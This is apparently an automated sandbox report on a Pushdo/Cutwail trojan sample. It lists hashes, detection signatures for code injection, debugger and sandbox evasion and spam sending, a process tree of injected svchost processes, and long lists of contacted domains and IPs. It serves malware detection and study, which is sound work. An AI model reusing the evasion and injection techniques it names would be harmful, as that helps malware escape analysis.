Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fs7AQcREFX.exe

Overview

General Information

Sample Name:fs7AQcREFX.exe
Original Sample Name:6bb40ed95f770955ea7cf27e4785612e.exe
Analysis ID:879119
MD5:6bb40ed95f770955ea7cf27e4785612e
SHA1:db93260f6bdeb2321fd73019af3d6182c97fd2c5
SHA256:f8ef3e3b18e72eebb4b18edbc90f7f5851ab0af044473fa2856fc974f0c33d6c
Tags:32Cutwailexetrojan
Infos:

Detection

Pushdo
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Backdoor Pushdo
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Writes to foreign memory regions
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Send many emails (e-Mail Spam)
Contains functionality to inject code into remote processes
Drops PE files to the user root directory
Contains functionality to inject threads in other processes
Tries to resolve many domain names, but no domain seems valid
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Found evasive API chain (may stop execution after checking a module file name)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Connects to many different domains
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Connects to several IPs in different countries
Uses SMTP (mail sending)
Found evasive API chain (may stop execution after accessing registry keys)
Drops PE files to the user directory
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • fs7AQcREFX.exe (PID: 7000 cmdline: C:\Users\user\Desktop\fs7AQcREFX.exe MD5: 6BB40ED95F770955EA7CF27E4785612E)
    • svchost.exe (PID: 6944 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
    • svchost.exe (PID: 23128 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6864 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 6BB40ED95F770955EA7CF27E4785612E)
    • svchost.exe (PID: 1672 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 3800 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 4876 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 5200 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
      • svchost.exe (PID: 6580 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • pigalicapi.exe (PID: 6080 cmdline: "C:\Users\user\pigalicapi.exe" MD5: 6BB40ED95F770955EA7CF27E4785612E)
    • svchost.exe (PID: 5892 cmdline: C:\Windows\system32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
PushdoPushdo is usually classified as a "downloader" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.719025818.0000000002B54000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
    00000000.00000002.719355201.0000000002520000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
      00000004.00000002.714243220.0000000000940000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
        00000000.00000002.720083201.0000000002554000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
          00000001.00000002.714052838.0000000000F50000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            1.2.pigalicapi.exe.f523c7.2.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
              0.2.fs7AQcREFX.exe.252053f.4.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                0.2.fs7AQcREFX.exe.25223c7.5.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                  0.2.fs7AQcREFX.exe.25223c7.5.raw.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                    4.2.pigalicapi.exe.9423c7.1.unpackJoeSecurity_PushdoYara detected Backdoor PushdoJoe Security
                      Click to see the 19 entries
                      No Sigma rule has matched
                      Timestamp:192.168.2.3104.21.23.949699802016867 05/31/23-14:49:56.370054
                      SID:2016867
                      Source Port:49699
                      Destination Port:80
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:173.231.184.124192.168.2.380515152037771 05/31/23-14:51:33.827958
                      SID:2037771
                      Source Port:80
                      Destination Port:51515
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:63.251.106.25192.168.2.380503292037771 05/31/23-14:51:28.831950
                      SID:2037771
                      Source Port:80
                      Destination Port:50329
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: fs7AQcREFX.exeReversingLabs: Detection: 24%
                      Source: http://www.credo.edu.pl/Avira URL Cloud: Label: malware
                      Source: http://www.credo.edu.pl/&Avira URL Cloud: Label: malware
                      Source: C:\Users\user\pigalicapi.exeReversingLabs: Detection: 24%
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_040047F0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008800
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_04008970
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_04008A70
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04004BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,0_2_04004BA0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_04008BB0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_04008CF0
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,0_2_04004880
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A237 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_0252A237
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A377 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_0252A377
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_02529FC7 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,0_2_02529FC7
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A4B7 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,0_2_0252A4B7
                      Source: C:\Users\user\Desktop\fs7AQcREFX.exeCode function: 0_2_0252A137 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,0_2_0252A137
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_040047F0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_040047F0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_04008800
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,1_2_04008970
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,1_2_04008A70
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04004BA0 CoInitialize,SetEvent,WaitForSingleObject,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetCurrentThreadId,GetSystemMetrics,GetSystemMetrics,GlobalMemoryStatus,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,wsprintfA,CryptBinaryToStringA,MultiByteToWideChar,VirtualFree,EnterCriticalSection,VirtualAlloc,VirtualAlloc,GetTickCount,VirtualFree,LeaveCriticalSection,VirtualFree,VirtualFree,VirtualFree,VirtualFree,CoUninitialize,1_2_04004BA0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008BB0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,1_2_04008BB0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04008CF0 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,1_2_04008CF0
                      Source: C:\Users\user\pigalicapi.exeCode function: 1_2_04004880 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDecrypt,CryptDestroyKey,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptDestroyHash,CryptReleaseContext,1_2_04004880
                      Source: fs7AQcREFX.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:58441 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:58451 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:58449 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.3:58456 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:58447 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50236 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50408 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50806 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50855 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50924 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:51502 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:51737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.96.7:443 -> 192.168.2.3:51779 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:51781 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:51897 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.3:55357 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:58500 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:63360 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:63455 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:63521 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64363 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:63758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:64698 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.3:64737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.3:64911 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:64992 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.3:50491 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 188.114.97.7:443 -> 192.168.2.3:50521 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.3:50520 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.3:50547 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.3:50561 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50581 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 94.130.146.206:443 -> 192.168.2.3:50587 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.3:50586 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.3:50932 version: TLS 1.2
                      Source: fs7AQcREFX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                      Networking

                      barindex
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: webways.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: impexnc.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: enguita.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dataform.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.26.7.17 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kallman.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.69.139.150 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nt-hat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.74.184.61 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gphpedit.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.20.55.214 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avse.hu
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.130.204.160 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.189.171.125 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 194.143.194.23 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 91.229.22.126 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: notis.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 5.39.75.157 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: willsub.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: nts-web.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: shesfit.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.vexcom.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: multip.hu
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tcpoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.27 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.194.202.26 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dog-jog.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kamptal.at
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 217.19.254.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bd-style.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 216.177.137.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 93.189.66.202 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: zupraha.cz
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: muhr-soehne.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 46.30.60.158 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: oaith.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 192.99.226.184 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 49.212.180.178 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aiolos-sa.gr
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: usadig.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.230.63.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.253.212.22 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gmail-smtp-in.l.google.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: fdlymca.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: assideum.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bidroll.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 62.122.170.171 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: karmy.com.pl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ncn.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 51.159.3.117 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: komie.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 79.124.76.247 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: onzcda.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sledsport.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tbvlugus.nl
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pellys.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.cokocoko.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.102.136.180 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 52.71.57.184 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: tozzhin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 195.96.252.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: de
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: lyto.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: websy.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: 106west.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ruzee.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.145 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 198.185.159.144 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.159.66.62 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mxs.mail.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: averwin.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 211.13.196.162 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: chzko.ru
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 76.223.35.103 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.204.129.113 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: themark.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ossir.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clysma.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 185.76.64.25 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 213.186.33.16 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: e-kami.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: scintel.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.230.93.218 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: kewlmail.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bount.com.tw
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: flamingorecordings.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: actmin.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bosado.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pers.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mackusick.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: mail7.digitalwaves.co.nz
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 157.7.107.88 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.53.77.146 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hes.pt
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: reproar.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.94.254.88 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.191.209.76 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 69.46.30.77 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: portoccd.org
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 43.255.29.192 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: avc.com.sa
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.236.62.147 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.nelipak.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.67.145.148 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.194.190.151 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 128.204.134.138 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 202.94.166.30 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ultibax.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: dspears.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.217.118.81 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.owsports.ca
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 103.224.212.222 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.stnic.co.uk
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: bggs.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: unicus.jp
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.41.152 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.31.143.1 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: clinicasanluis.com.co
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.petsfan.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: peminet.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: umcor.am
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: michiana.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ludomemo.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.maktraxx.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: pccj.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ssm.ch
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: wvs-net.de
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 108.170.12.50 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.205.126.33 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: adeesa.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.248.97.36 25Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sjbmw.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: strazynski.pl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 173.231.184.124 80
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 153.120.34.73 443
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: amerifor.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 164.90.244.158 25
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gujarat.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.177.67.59 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: ifesnet.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 104.21.29.72 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: vfcindia.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: aoinko.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: yoruksut.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: cpwpb.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: akdeniz.nl
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 205.149.134.32 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: rtcasey.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: n23china.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: gydrozo.ru
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: hamaker.net
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.aevga.com
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: sigtoa.com
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 133.125.38.187 25
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 174.129.25.170 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.koz1.net
                      Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 89.161.136.188 80
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: refintl.org
                      Source: C:\Windows\SysWOW64\svchost.exeDomain query: www.myropcb.com
